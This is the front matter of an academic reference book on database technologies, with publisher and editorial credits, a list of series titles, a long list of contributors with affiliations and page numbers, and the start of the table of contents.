This content was uploaded by our users and we assume good faith they have the permission to share this book. If you own the copyright to this book and it is wrongfully on our website, we offer a simple DMCA procedure to remove your content from our site. Start by pressing the button below!
Database Technologies: Concepts, Methodologies, Tools, and Applications John Erickson University of Nebraska–Omaha, USA
Volume I
INFORMATION SCIENCE REFERENCE Hershey • New York
Director of Editorial Content: Senior Managing Editor: Managing Editor: Assistant Managing Editor: Typesetters: Cover Design: Printed at:
Kristin Klinger Jamie Snavely Jeff Ash Carole Coulson Jeff Ash, Michael Brehm, Carole Coulson, Elizabeth Duke, Jennifer Henderson, Christopher Hrobak, Jamie Snavely, Sean Woznicki Lisa Tosheff Yurchak Printing Inc.
British Cataloguing in Publication Data A Cataloguing in Publication record for this book is available from the British Library. All work contributed to this book is new, previously-unpublished material. The views expressed in this book are those of the authors, but not necessarily of the publisher.
If a library purchased a print copy of this publication, please go to http://www.igi-global.com/agreement for information on activating the library's complimentary electronic access to this publication.
Editor-in-Chief Mehdi Khosrow-Pour, DBA Editor-in-Chief Contemporary Research in Information Science and Technology, Book Series
Associate Editors Steve Clarke University of Hull, UK Murray E. Jennex San Diego State University, USA Annie Becker Florida Institute of Technology USA Ari-Veikko Anttiroiko University of Tampere, Finland
Editorial Advisory Board Sherif Kamel American University in Cairo, Egypt In Lee Western Illinois University, USA Jerzy Kisielnicki Warsaw University, Poland Keng Siau University of Nebraska-Lincoln, USA Amar Gupta Arizona University, USA Craig van Slyke University of Central Florida, USA John Wang Montclair State University, USA Vishanth Weerakkody Brunel University, UK
Additional Research Collections found in the “Contemporary Research in Information Science and Technology” Book Series Data Mining and Warehousing: Concepts, Methodologies, Tools, and Applications John Wang, Montclair University, USA • 6-volume set • ISBN 978-1-60566-056-1 Electronic Business: Concepts, Methodologies, Tools, and Applications In Lee, Western Illinois University • 4-volume set • ISBN 978-1-59904-943-4 Electronic Commerce: Concepts, Methodologies, Tools, and Applications S. Ann Becker, Florida Institute of Technology, USA • 4-volume set • ISBN 978-1-59904-943-4 Electronic Government: Concepts, Methodologies, Tools, and Applications Ari-Veikko Anttiroiko, University of Tampere, Finland • 6-volume set • ISBN 978-1-59904-947-2 Knowledge Management: Concepts, Methodologies, Tools, and Applications Murray E. Jennex, San Diego State University, USA • 6-volume set • ISBN 978-1-59904-933-5 Information Communication Technologies: Concepts, Methodologies, Tools, and Applications Craig Van Slyke, University of Central Florida, USA • 6-volume set • ISBN 978-1-59904-949-6 Intelligent Information Technologies: Concepts, Methodologies, Tools, and Applications Vijayan Sugumaran, Oakland University, USA • 4-volume set • ISBN 978-1-59904-941-0 Information Security and Ethics: Concepts, Methodologies, Tools, and Applications Hamid Nemati, The University of North Carolina at Greensboro, USA • 6-volume set • ISBN 978-1-59904-937-3 Medical Informatics: Concepts, Methodologies, Tools, and Applications Joseph Tan, Wayne State University, USA • 4-volume set • ISBN 978-1-60566-050-9 Mobile Computing: Concepts, Methodologies, Tools, and Applications David Taniar, Monash University, Australia • 6-volume set • ISBN 978-1-60566-054-7 Multimedia Technologies: Concepts, Methodologies, Tools, and Applications Syed Mahbubur Rahman, Minnesota State University, Mankato, USA • 3-volume set • ISBN 978-1-60566-054-7 Virtual Technologies: Concepts, Methodologies, Tools, and Applications Jerzy Kisielnicki, Warsaw University, Poland • 3-volume set • ISBN 978-1-59904-955-7
Free institution-wide online access with the purchase of a print collection!
INFORMATION SCIENCE REFERENCE Hershey • New York
Order online at www.igi-global.com or call 717-533-8845 ext.100 Mon–Fri 8:30am–5:00 pm (est) or fax 24 hours a day 717-533-7115
List of Contributors
Abdul-Mehdi, Ziyad Tariq \ Multimedia University, Malaysia ..................................................... 1257 Adogbeji, Oghenevwogaga Benson \ Delta State University, Abraka, Nigeria ............................. 1454 Adomi, Esharenana E. \ Delta State University, Abraka, Nigeria.................................................. 1454 Adzic, Jovanka \ Telecom Italia, Italy ............................................................................................... 847 Afsarmanesh, Hamideh \ University of Amsterdam, The Netherlands........................................... 1446 Al-Ahmadi, Mohammad Saad \ Oklahoma State University, USA.................................................. 186 Al-Ali, Abdul-Rahman \ American University of Sharjah, UAE.................................................... 1357 Al-Ameed, Hayder \ United Arab Emirates University, United Arab Emirates ............................. 1899 Alavares, Luis Otavio \ Universidade Federal do Rio Grande do Sul (UFRGS), Brazil ............... 2405 Al-Hanbali, Nedal \ Al-Balqa’ Applied University, Jordan ............................................................. 1741 Amparo Vila, M. \ University of Granada, Spain ........................................................................... 2448 Anbumani, K. \ Karunya Institute of Technology and Sciences (Deemed University), India......... 1050 Artz, John M. \ The George Washington University, USA .................................................................... 1 Ashktorab, Hassan \ Howard University Hospital, USA ................................................................ 1393 Au, Wai-Ho \ Microsoft Corporation, USA, ................................................................................... 2427 Aufaure, Marie-Aude \ Supélec—INRIA, France............................................................................... 60 Azevedo, Paulo Jorge \ Universidade do Minho, Portugal ............................................................ 2632 Azzag, H. \ Université François-Rabelais de Tours, France and Laboratoire d‘Informatique (EA 2101), France............................................................................................................................. 1151 Bagchi, Aditya \ Indian Statistical Institute, India ............................................................................ 414 Bajaj, Akhilesh \ The University of Tulsa, USA .............................................................................. 1723 Baker, Jason D. \ Regent University, USA....................................................................................... 1285 Bandyopadhyay, A.K. \ Jadavpur University, India ......................................................................... 414 Bang, Jounghae \ Kookmin University, Korea ................................................................................ 1778 Barbosa Perkusich, Maria Lígia \ Universidade Católica de Pernambuco, Brazil ...................... 1020 Bartsch, Robert A. \ University of Houston–Clear Lake, USA....................................................... 1867 Barzdins, Guntis \ University of Latvia, Latvia .............................................................................. 2360 Barzdins, Janis \ University of Latvia, Latvia ................................................................................. 2360 Bass, Kristin M. \ University of California, Berkeley, USA ............................................................ 1291 Beaubouef, Theresa \ Southeastern Louisiana University, USA..................................................... 1127 Beckerman, Barbara G. \ Oak Ridge National Laboratory, USA .................................................... 484 Bellatreche, Ladjel \ Poitiers University, France ........................................................................... 2292 Berberidis, Christos \ Aristotle University of Thessaloniki, Greece............................................... 2192 Berčič, Boštjan \ Institute for Economics, Law and Informatics, Slovenia ..................................... 2085 Berjón Gallinas, Roberto \ Pontifical University of Salamanca, Spain ......................................... 1959
Blanco, Ignacio José \ University of Granada, Spain ..................................................................... 2448 Blind, Knut \ Fraunhofer Institute for Systems and Innovation Research, Germany and Berlin University of Technology, Germany................................................................................ 1529 Bogorny, Vania \ Universidade Federal do Rio Grande do Sul (UFRGS), Brazil and Transnational University of Limburg, Belgium ......................................................................... 2405 Boston, George \ Western Michigan University, USA ..................................................................... 1405 Botsis, Taxiarchis \ Athens Medical School, Greece ....................................................................... 1385 Bouet, Marinette \ LIMOS, Blaise Pascal University-Clermont-Ferrand, France ............................ 60 Bouguettaya, Athman \ Virginia Tech, USA ..................................................................................... 903 Boussaïd, Omar \ University LUMIERE Lyon, France....................................................................... 60 Brayner, Angelo \ University of Fortaleza, Brazil........................................................................... 2472 Bruckner, Robert M. \ Microsoft, USA............................................................................................. 505 Brydon, Michael \ Simon Fraser University, Canada..................................................................... 2572 Buccafurri, Francesco \ University “Mediterranea” of Reggio Calabria, Italy ............................ 2037 Caminiti, Gianluca \ University “Mediterranea” of Reggio Calabria, Italy ................................. 2037 Candan, K. Selçuk \ Arizona State University, USA ....................................................................... 1276 Cannataro, Mario \ Università “Magna Græcia” di Catanzaro, Italy........................................... 1267 Cao, Tru H. \ Ho Chi Minh City University of Technology, Vietnam ................................................ 126 Caroprese, Luciano \ DEIS Universitá della Calabria, Italy ......................................................... 2051 Caschera, Maria Chiara \ IRPPS-CNR, Italy................................................................................. 1003 Cavalcanti, Valéria M. B. \ Federal University of Campina Grande, Brazil ................................... 987 Cerans, Karlis \ University of Latvia, Latvia .................................................................................. 2360 Chan, Hock Chuan \ National University of Singapore, Singapore ............................................... 1604 Che, Dunren \ Illinois University at Carbondale, USA ................................................................... 2059 Chen, Jianhua \ Louisiana State University, USA........................................................................... 2166 Chen, Min \ Florida International University, USA ........................................................................ 1189 Chen, Peter P. \ Louisiana State University, USA ............................................................................. 702 Chen, Shu-Ching \ Florida International University, USA............................................................. 1189 Chen, Yan \ Louisiana State University Agricultural Center, USA.................................................. 2166 Cheung, Pak-Keung \ University of Hong Kong, Pokfulam, Hong Kong....................................... 1622 Christophides, V. \ Institute of Computer Science & University of Crete, Greece............................ 596 Coenen, Frans \ University of Liverpool, UK.................................................................................. 2657 Cress, Ulrike \ Knowledge Media Research Center, Germany........................................................ 1670 Crowston, Kevin \ Syracuse University, USA ................................................................................... 797 Cuadrado, J. J. \ University of Alcalá de Henares, Spain............................................................... 2000 Cuapa Canto, Rosalba \ Benemérita Universidad Autónoma de Puebla, Mexico ......................... 2261 Cunningham, Colleen \ Drexel University, USA............................................................................... 702 Cuzzocrea, Alfredo \ University of Calabria, Italy ........................................................................... 165 D’Ulizia, Arianna \ IRPPS-CNR, Italy ............................................................................................ 1003 Dalkilic, Mehmet \ Indiana University, USA................................................................................... 2384 Dallwitz, John \ Ara Irititja, Pitjantjatjara Council Inc., Australia................................................ 1462 Dang, Tran Khanh \ National University of Ho Chi Minh City, Vietnam....................................... 2204 Danielson, Peter \ University of British Columbia, Canada ........................................................... 1808 Darmont, Jérôme \ ERIC, University of Lyon 2, France ................................................................ 1226 David, Stefano \ Polytechnic University of Marche, Italy ................................................................. 257 de Aguiar Moraes Filho, José \ University of Fortaleza, Brazil..................................................... 2472
de Almeida, Hyggo Oliveira \ Federal University of Campina Grande, Brazil ............................. 1020 de Amo, Sandra \ Universidade Federal de Uberlândia, Brazil..................................................... 1205 de Caluwe, Rita \ Ghent University, Belgium.................................................................................... 135 de la Torre Díez, Isabel \ University of Valladolid, Spain............................................................... 1372 de Souza Baptista, Claudio \ Federal University of Campina Grande, Brazil ................................ 987 de Tré, Guy \ Ghent University, Belgium........................................................................................... 135 Deb, Sagarmay \ Southern Cross University, Australia .................................................................... 179 Decker, Hendrik \ Universidad Politécnica de Valencia, Spain ....................................................... 212 Dholakia, Nikhilesh \ University of Rhode Island, USA ................................................................. 1778 Dillon, Tharam S. \ University of Technology, Sydney, Australia ..................................................... 570 Ding, Gang \ Olympus Communication Technology of America, Inc., USA.................................... 2564 Dirs, Mustafa M. \ College University Technology Tun Hussein Onn, Malaysia ........................... 1257 Dolado, J. J. \ University of the Basque Country, Spain.................................................................. 2000 Duncan, George T. \ Carnegie Mellon University, USA ................................................................. 1823 Elovici, Yuval \ Ben-Gurion University of the Negev, Israel ............................................................. 384 Engel, Paulo Martins \ Universidade Federal do Rio Grande do Sul (UFRGS), Brazil................ 2405 Eschenbrenner, Brenda \ University of Nebraska-Lincoln, USA ................................................... 2595 Etzkorn, Letha H. \ University of Alabama, USA........................................................................... 1984 Evermann, Joerg \ Memorial University of Newfoundland–St. John’s, Canada .............................. 282 Evdoridis, Theodoros \ University of the Aegean, Greece.............................................. 13, 2079, 2109 Faloutsos, Christos \ Carnegie Mellon University, USA................................................................. 2011 Fan, Fengxian \ Kunming University, China ................................................................................... 1568 Fermoso Garcia, Ana María \ Pontifical University of Salamanca, Spain .................................... 1959 Fernández-Medina, Eduardo \ Universidad de Castilla-La Mancha, Spain................................... 637 Ferreira, Pedro Gabriel \ Universidade do Minho, Portugal......................................................... 2632 Ferrer-Troyano, F. \ University of Seville, Spain ............................................................................ 2000 Fiore, Valter \ Telecom Italia, Italy.................................................................................................... 847 Flores, Dionicio Zacarías \ Benemérita Universidad Autónoma de Puebla, Mexico ..................... 2261 Flores, Fernando Zacarías \ Benemérita Universidad Autónoma de Puebla, Mexico................... 2261 Folinas, Nikolaos \ University of Ioannina, Greece ........................................................................ 1844 Fong, Joseph \ City University of Hong Kong, Hong Kong ............................................................ 2489 Fox, Mark S. \ University of Toronto, Canada ................................................................................ 2384 Fugazza, Cristiano \ University of Milan, Italy................................................................................. 257 Furtado, Pedro \ Universidade de Coimbra, Portugal...................................................................... 658 Gadish, David A. \ California State University Los Angeles, USA ................................................. 2685 Gançarski, Pierre \ LSIIT-AFD-Louis Pasteur University, France .................................................... 60 Gaynor, Mark \ Boston University School of Management, USA................................................... 1344 Gedeon, Randle J. \ Western Michigan University, USA ................................................................ 1405 Gelbard, Roy \ Bar-Ilan University, Israel...................................................................................... 2157 George, Carlisle \ Middlesex University, UK .................................................................................. 2085 Giacometti, Arnaud \ Université François Rabelais de Tours, France .......................................... 1205 Golfarelli, Matteo \ DEIS–University of Bologna, Italy.................................................................... 221 González Císaro, Sandra Elizabeth \ Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina ............................................................................................ 648 Gorla, Narasimhaiah \ American University of Sharjah, UAE ...................................................... 2543
Guinot, C. \ CE.R.I.E.S., Unité Biométrie et Epidémiologie, and Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France........ 1151 Guo, Huiping \ California State University at Los Angeles, USA................................................... 2223 Guzmán Muñoz, Luis Miguel \ Benemérita Universidad Autónoma de Puebla, Mexico.............. 2261 Hakkani-Tür, Dilek \ AT&T Labs—Research, USA........................................................................ 2129 Halaoui, Hatem F. \ Haigazian University, Lebanon ........................................................................ 395 Hamel, Lutz \ University of Rhode Island, USA.............................................................................. 1778 Hashmi, Nada \ 10Blade, Inc., USA ................................................................................................ 1344 Hertzberger, Louis O. \ University of Amsterdam, The Netherlands.............................................. 1446 Hornero Sánchez, Roberto \ University of Valladolid, Spain......................................................... 1372 Hosseinkhah, Fatemeh \ Howard University Hospital, USA.......................................................... 1393 Hosszú, Gábor \ Budapest University of Technology and Economics, Hungary ............................ 1663 Houliston, Bryan \ Auckland University of Technology, New Zealand........................................... 2324 Hughes, Martin \ Smart Works, Australia ....................................................................................... 1462 Huh, Soon-Young \ KAIST Business School, South Korea................................................................ 755 Hults, Patricia \ Rensselaer Polytechnic Institute, USA.................................................................... 320 Hurson, Ali R. \ Pennsylvania State University, USA ....................................................................... 484 Ibrahim, Hamidah \ Universiti Putra Malaysia, Malaysia ............................................................ 1257 Ieronutti, Lucio \ University of Udine, Italy...................................................................................... 615 Indraratne, Harith \ Budapest University of Technology and Economics, Hungary ..................... 1663 Islam, Zahidul \ Independent University, Bangladesh .................................................................... 1936 Jiao, Yu \ Oak Ridge National Laboratory, USA ............................................................................... 484 Junior, Waldecir P. \ Universidade Federal de Uberlândia, Brazil................................................ 1205 Kacprzyk, Janusz \ Polish Academy of Sciences, Poland....................................................... 135, 1038 Kaletas, Ersin C. \ University of Amsterdam, The Netherlands ...................................................... 1446 Kang, David \ Chapman University, USA........................................................................................ 1756 Karamalis, Athanasios \ Computer Scientist and Researcher, Germany........................................ 1420 Karydis, Ioannis \ Aristotle University of Thessaloniki, Greece......................................................... 35 Katakis, Ioannis \ Aristotle University of Thessaloniki, Greece ....................................................... 309 Kim, Hee-Woong \ National University of Singapore, Singapore................................................... 1604 Kim, Henry M. \ York University, Canada...................................................................................... 2384 Kimmerle, Joachim \ University of Tuebingen, Germany .............................................................. 1670 King, William R. \ University of Pittsburgh, USA........................................................................... 1638 Klemen, Markus D. \ Vienna University of Technology, Austria .................................................... 2348 Koffina, I. \ Institute of Computer Science & University of Crete, Greece........................................ 596 Korff, Lori \ Virginia Tech, USA........................................................................................................ 903 Kouris, Ioannis N. \ University of Patras, Greece ............................................................................ 196 Kovács, László \ University of Miskolc, Hungary ............................................................................. 931 Krejza, Andrea \ Credit Suisse, Switzerland ................................................................................... 1787 Kubota, Sachiko \ Hiroshima University, Japan............................................................................... 956 Kwahk, Kee-Young \ Kookmin University, Korea .......................................................................... 1604 Kwan, M. Millie \ University of Hong Kong, Pokfulam, Hong Kong ............................................. 1622 Laleau, Régine \ University of Paris 12, France............................................................................. 1168 Landolsi, Taha \ American University of Sharjah, UAE ................................................................. 1357 Langton, Marcia \ The University of Melbourne, Australia ........................................................... 1472 Lax, Gianluca \ University “Mediterranea” of Reggio Calabria, Italy.......................................... 2037
Le, D. Xuan \ La Trobe University, Australia .................................................................................... 678 Li, Chang-Tsun \ University of Warwick, UK ................................................................................. 1062 Li, Xining \ University of Guelph, Guelph, Canada .......................................................................... 457 Li, Yingjiu \ Singapore Management University, Singapore ........................................................... 2223 Lim, Say Ying \ Monash University, Australia ...................................................................... 1108, 1235 Ling, Tok Wang \ National University of Singapore, Singapore....................................................... 505 Liu, Han \ Carnegie Mellon University, USA .................................................................................... 505 Lobina, Mirko Luca \ University of Cagliari, Italy ........................................................................ 2616 Locuratolo, Elvira \ ISTI, Consiglio Nazionale delle Ricerche, Italy ............................................... 440 Loendorf, Todd \ North Carolina State University, USA ................................................................ 1511 López Coronado, Miguel \ University of Valladolid, Spain............................................................ 1372 López Gálvez, María Isabel \ University of Valladolid, Spain ....................................................... 1372 Ma, Z. M. \ Northeastern University, China.............................................................................. 105, 338 Madiraju, Praveen \ Marquette University, USA.............................................................................. 550 Maier, Daniel \ Credit Suisse, Switzerland ...................................................................................... 1787 Makris, Christos \ University of Patras, Greece............................................................................... 196 Malik, Zaki \ Virginia Tech, USA....................................................................................................... 903 Mallach, Efrem \ University of Massachusetts, Dartmouth, USA..................................................... 468 Mamat, Ali Bin \ Universiti Putra Malaysia, Malaysia .................................................................. 1257 Mammar, Amel \ University of Luxembourg, Luxembourg............................................................. 1168 Mann, Bruce L. \ Memorial University, Canada .............................................................................. 894 Manolopoulos, Yannis \ Aristotle University of Thessaloniki, Greece................................................ 35 Manouselis, Nikos \ Agricultural University of Athens, Greece........................................................ 362 Margaritis, Dimitris \ Iowa State University, USA ......................................................................... 2011 Margerum-Leys, Jon \ Eastern Michigan University, USA............................................................ 1291 Martinenghi, Davide \ Free University of Bozen/Bolzano, Italy ...................................................... 212 Martínez-Cruz, Carmen \ University of Jaén, Spain ..................................................................... 2448 Mayer, Christopher B. \ Air Force Institute of Technology, USA................................................... 1276 Mazel, Odette \ The University of Melbourne, Australia ................................................................ 1472 McDonald, J. Scott \ University of Texas El Paso, USA ................................................................. 1682 McKenzie, W. Brett \ Roger Williams University, USA .................................................................... 205 Meged, Avichai \ Bar-Ilan University, Israel................................................................................... 2157 Meirelles, Marcelo \ University of Fortaleza, Brazil ...................................................................... 2472 Meo, Rosa \ Università di Torino, Italy............................................................................................ 1320 Merwin, Gerald A. Jr. \ Valdosta State University, USA ................................................................ 1682 Mitra, Susanta \ International Institute of Information Technology, India....................................... 414 Mohan, Sriram \ Indiana University, USA........................................................................................ 527 Molinaro, Cristian \ DEIS Universitá della Calabria, Italy ........................................................... 2051 Montesanto, Anna \ Polytechnic University of Marche, Italy........................................................... 257 Moulton, Steven \ Boston University School of Medicine, USA ..................................................... 1344 Muegeli, Thomas \ Credit Suisse, Switzerland ................................................................................ 1787 Mula, Davide \ LUISS Guido Carli, Italy ........................................................................................ 2616 Myung, Dan \ 10Blade, Inc., USA ................................................................................................... 1344 Nah, Fiona Fui-Hoon \ University of Nebraska-Lincoln, USA ............................................. 1936, 2595 Nanopoulos, Alexandros \ Aristotle University of Thessaloniki, Greece............................................ 35 Nassis, Vicky \ La Trobe University, Australia .................................................................................. 570
Natarajan, Rajesh \ Indian Institute of Management Lucknow (IIML), India................................ 1652 Naumann, Felix \ Humboldt-Universität zu Berlin, Germany ........................................................ 2140 Navathe, Shamkant B. \ Georgia Institute of Technology, USA ....................................................... 550 Nedunchezhian, R. \ Sri Ramakrishna Engineering College, India ............................................... 1050 Newhouse, C. Paul \ Edith Cowan University, Australia ................................................................ 1309 Ni, Jingbo \ University of Guelph, Guelph, Canada.......................................................................... 457 Nigro, Héctor Oscar \ Universidad Nacional del Centro de la Provincia de Buenos Aires, Argentina ............................................................................................ 648 Nlenanya, Inya \ Iowa State University, USA.................................................................................... 778 Odera, Levy C. \ University of Florida, USA.................................................................................. 1682 Oke, S. A. \ University of Lagos, Nigeria........................................................................................... 940 Orme, Anthony Mark \ Athens State University, USA ................................................................... 1984 Owrang O., M. Mehdi \ American University, USA ............................................................... 238, 1393 Ozkul, Tarik \ American University of Sharjah, UAE..................................................................... 1357 Palmer, Lisa \ The University of Melbourne, Australia................................................................... 1472 Papapetrou, Evangelos \ University of Ioannina, Greece............................................................... 1844 Patki, A. B. \ Department of Information Technology, India ........................................................... 1490 Patki, Tapasya \ GGSIP University, India ....................................................................................... 1490 Pears, Russel \ Auckland University of Technology, New Zealand.................................................. 2324 Pedersen, Torben Bach \ Aalborg University, Denmark................................................................. 2510 Pepe, Marissa \ Boston University School of Management, USA ................................................... 1344 Perkusich, Angelo \ Federal University of Campina Grande, Brazil ............................................. 1020 Petry, Frederick E. \ Naval Research Laboratory, USA ................................................................. 1127 Piattini, Mario \ Universidad de Castilla-La Mancha, Spain ........................................................... 637 Picariello, Antonio \ University of Napoli, Italy.............................................................................. 2275 Picarougne, F. \ Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France ............................................................................... 1151 Pighin, Maurizio \ University of Udine, Italy.................................................................................... 615 Pitoura, Evaggelia \ University of Ioannina, Greece ...................................................................... 1844 Potok, Thomas E. \ Oak Ridge National Laboratory, USA............................................................... 484 Poza Crespo, Jesús \ University of Valladolid, Spain...................................................................... 1372 Psaila, Giuseppe \ Università di Bergamo, Italy ............................................................................. 1320 Radaideh, Moh’d A. \ Abu Dhabi Police – Ministry of Interior, United Arab Emirates ................ 1899 Raffeiner, Stefan \ Vienna University of Technology, Austria ......................................................... 2348 Rahayu, J. Wenny \ La Trobe University, Melbourne, Australia.............................................. 570, 678 Rajugan, R. \ University of Technology, Sydney, Australia ............................................................... 570 Ram, Sudha \ The University of Arizona, USA................................................................................ 1723 Ras, Zbigniew W. \ University of North Carolina at Charlotte, USA ............................................. 2313 Ravat, Franck \ Université Toulouse I, France................................................................................. 961 Reinhartz-Berger, Iris \ University of Haifa, Israel ....................................................................... 1581 Rezgui, Abdelmounaam \ Virginia Tech, USA.................................................................................. 903 Ribeiro Neto, Pedro Fernandes \ Universidade do Estado do Rio Grande do Norte, Brazil ........ 1020 Riquelme, J. \ University of Seville, Spain ...................................................................................... 2000 Rizzi, Stefano \ DEIS–University of Bologna, Italy..................................................................... 86, 221 Rocchi, Cesare \ Polytechnic University of Marche, Italy................................................................. 257 Rodríguez, D. \ University of Reading, UK ..................................................................................... 2000
Roehrig, Stephen F. \ Carnegie Mellon University, USA................................................................ 1823 Röhm, Uwe \ University of Sydney, Australia.................................................................................... 829 Rokach, Lior \ Ben-Gurion University of the Negev, Israel .............................................................. 384 Rong, Graham H. \ Massachusetts Institute of Technology, USA................................................... 2166 Rosen, Peter A. \ University of Evansville, USA................................................................................ 186 Rossi, Matti \ Helsinki School of Economics, Finland .................................................................... 1876 Roth, Mary \ IBM Silicon Valley Lab, USA..................................................................................... 2140 Sadoun, Balqies \ Al-Balqa’ Applied University, Jordan................................................................. 1741 Sapino, Maria Luisa \ University of Torino, Italy........................................................................... 2275 Saygin, Yücel \ Sabanci University, Turkey ..................................................................................... 2129 Schiel, Ulrich \ Federal University of Campina Grande, Brazil ....................................................... 987 Schlueter Langdon, Christoph \ University of Southern California, USA ...................................... 866 Scozzi, Barbara \ Politecnico di Bari, Italy....................................................................................... 797 Selviah, David R. \ University College London, UK ....................................................................... 1084 Sengupta, Arijit \ Wright State University, USA ..................................................................... 527, 2384 Serfiotis, G. \ Institute of Computer Science & University of Crete, Greece..................................... 596 Shahri, Hamid Haidarian \ University of Maryland, USA............................................................. 2245 Shekar, B. \ Indian Institute of Management Bangalore (IIMB), India ........................................... 1652 Shin, Seung-Kyoon \ University of Rhode Island, USA .................................................................. 1778 Shiu, Herbert \ City University of Hong Kong, Hong Kong ........................................................... 2489 Siau, Keng \ University of Nebraska-Lincoln, USA......................................................................... 2595 Sisto, Luisella \ Telecom Italia, Italy ................................................................................................. 847 Smolander, Kari \ Lappeenranta University of Technology, Finland ............................................. 1876 Song, Il-Yeol \ Drexel University, USA .............................................................................................. 702 Song, Lei \ University of Guelph, Guelph, Canada ........................................................................... 457 Squire, Megan \ Elon University, USA ............................................................................................ 2301 Srinivasan, Bala \ Monash University, Australia .................................................................. 1108, 1235 Stewart, Tracy R. \ Regent University, USA ................................................................................... 1285 Sturm, Arnon \ Ben-Gurion University of the Negev, Israel........................................................... 1581 Sugito, Shigenobu \ Sugiyama University, Japan.............................................................................. 956 Sun, Wei \ Monash University, Australia ......................................................................................... 1552 Sunderraman, Rajshekhar \ Georgia State University, USA........................................................... 550 Suni, Ravio \ University of Tartu, Estonia ....................................................................................... 1477 Syrigos, Konstantinos \ Athens Medical School, Greece................................................................ 1385 Tan, Mathew \ Agilent Technologies, Malaysia............................................................................... 1936 Taniar, David \ Monash University, Australia ...................................................... 678, 1108, 1235,1552 Tannen, V. \ University of Pennsylvania, USA................................................................................... 596 Teste, Olivier \ Université Toulouse III, France ................................................................................ 961 Theodoridis, Evangelos \ University of Patras, Greece.................................................................... 196 Thrun, Sebastian \ Stanford University, USA ................................................................................. 2011 Tikk, Domonkos \ Budapest University of Technology and Economics, Hungary ........................... 931 Tininini, Leonardo \ IASI-CNR, Italy ............................................................................................. 1003 Tjoa, A. Min \ Vienna University of Technology, Austria .................................................................. 505 Tollefsen, William W. \ Boston University School of Medicine, USA ............................................. 1344 Torabi, Torab \ La Trobe University, Australia ............................................................................... 1552 Trubitsyna, Irina \ DEIS Universitá della Calabria, Italy.............................................................. 2051
Trujillo, Juan \ Universidad de Alicante, Spain ................................................................................ 637 Tsakalidis, Athanasios \ University of Patras, Greece...................................................................... 196 Tsoumakas, Grigorios \ Aristotle University of Thessaloniki, Greece...................................... 157, 309 Tu, Yi-Cheng \ University of South Florida, USA ........................................................................... 2564 Tür, Gökhan \ AT&T Labs–Research, USA..................................................................................... 2129 Tzanis, George \ Aristotle University of Thessaloniki, Greece ....................................................... 2192 Tzikopoulos, Agiris \ Agricultural University of Athens, Greece...................................................... 362 Tzouramanis, Theodoros \ University of the Aegean, Greece.............................. 13, 2079, 2109, 2118 Udoh, Emmanuel \ Indiana University–Purdue University, USA........................................... 887, 1928 Unal, Ozgul \ University of Amsterdam, The Netherlands............................................................... 1446 Vassiliadis, Panos \ University of Ioannina, Greece........................................................................ 1844 Veen, Ranjit \ American University, USA........................................................................................ 1393 Veltri, Pierangelo \ Università “Magna Græcia” di Catanzaro, Italy............................................ 1267 Venturini, G. \ Université François-Rabelais de Tours, Laboratoire d‘Informatique (EA 2101), France............................................................................................................................. 1151 Verykios, Vassilios S. \ University of Thessaly, Greece................................................................... 2268 Villarroel, Rodolfo \ Universidad Católica del Maule, Chile ........................................................... 637 Vining, Aidan R. \ Simon Fraser University, Canada..................................................................... 2572 Vlahavas, Ioannis \ Aristotle University of Thessaloniki, Greece..................................................... 157 Vuorikari, Riina \ European Schoolnet, Belgium.............................................................................. 362 Wang, Haibin \ Emory University, USA ............................................................................................ 550 Wang, Shuhong \ University of Wollongong, Australia................................................................... 2223 Wang, Yanbo J. \ University of Liverpool, UK................................................................................ 2657 Wei, Chia-Hung \ University of Warwick, UK ................................................................................ 1062 Weippl, Edgar R. \ Secure Business Austria, Austria and Vienna University of Technology, Austria........................................................................ 2100, 2348 Welsh, Matt \ Harvard University, USA .......................................................................................... 1344 Wilson, Rick L. \ Oklahoma State University, USA .......................................................................... 186 Wilson, Roland \ University of Warwick, UK.................................................................................. 1062 Wolff, J. Gerard \ CognitionResearch.org.uk, UK............................................................................ 725 Wyrzykowska, Elzbieta M. \ University of Information Technology and Management, Poland... 2313 Yakali, H. Hakan \ University of Amsterdam, The Netherlands...................................................... 1446 Yan Betty, Pang Wing \ Hong Kong Polytechnic University, Hong Kong...................................... 2543 Yang, Kun-Woo \ Keimyung University, South Korea ...................................................................... 755 Yin, Xuepeng \ Aalborg University, Denmark ................................................................................. 2510 Zadrożny, Slawomir \ Polish Academy of Sciences, Poland .................................................. 135, 1038 Zarras, Apostolos \ University of Ioannina, Greece........................................................................ 1844 Zhang, Ji \ University of Toronto, Canada ........................................................................................ 505 Zhao, Wenbing \ Cleveland State University, USA ............................................................................. 28 Zheng, Xinwei \ University of Durham, UK .................................................................................... 2657 Zumpano, Ester \ DEIS Universitá della Calabria, Italy ............................................................... 2051 Zurfluh, Gilles \ Université Toulouse I, France ................................................................................ 961
Contents
Volume I Section I. Fundamental Concepts and Theories This section serves as the foundation for this exhaustive reference tool by addressing crucial theories essential to the understanding of database technologies. Chapters found within these pages provide an excellent framework in which to position database technologies within the field of information science and technology. Individual contributions provide overviews of data warehousing and database management systems, while also exploring critical stumbling blocks of this field. Within this introductory section, the reader can learn and choose from a compendium of expert research on the elemental theories underscoring the research and application of database technologies. Chapter 1.1. Philosophical Foundations of Information Modeling ........................................................ 1 John M. Artz, The George Washington University, USA Chapter 1.2. A Generalized Comparison of Open Source and Commercial Database Management Systems ................................................................................................................................................. 13 Theodoros Evdoridis, University of the Aegean, Greece Theodoros Tzouramanis, University of the Aegean, Greece Chapter 1.3. Highly Available Database Management Systems........................................................... 28 Wenbing Zhao, Cleveland State University, USA Chapter 1.4. Mining in Music Databases.............................................................................................. 35 Ioannis Karydis, Aristotle University of Thessaloniki, Greece Alexandros Nanopoulos, Aristotle University of Thessaloniki, Greece Yannis Manolopoulos, Aristotle University of Thessaloniki, Greece
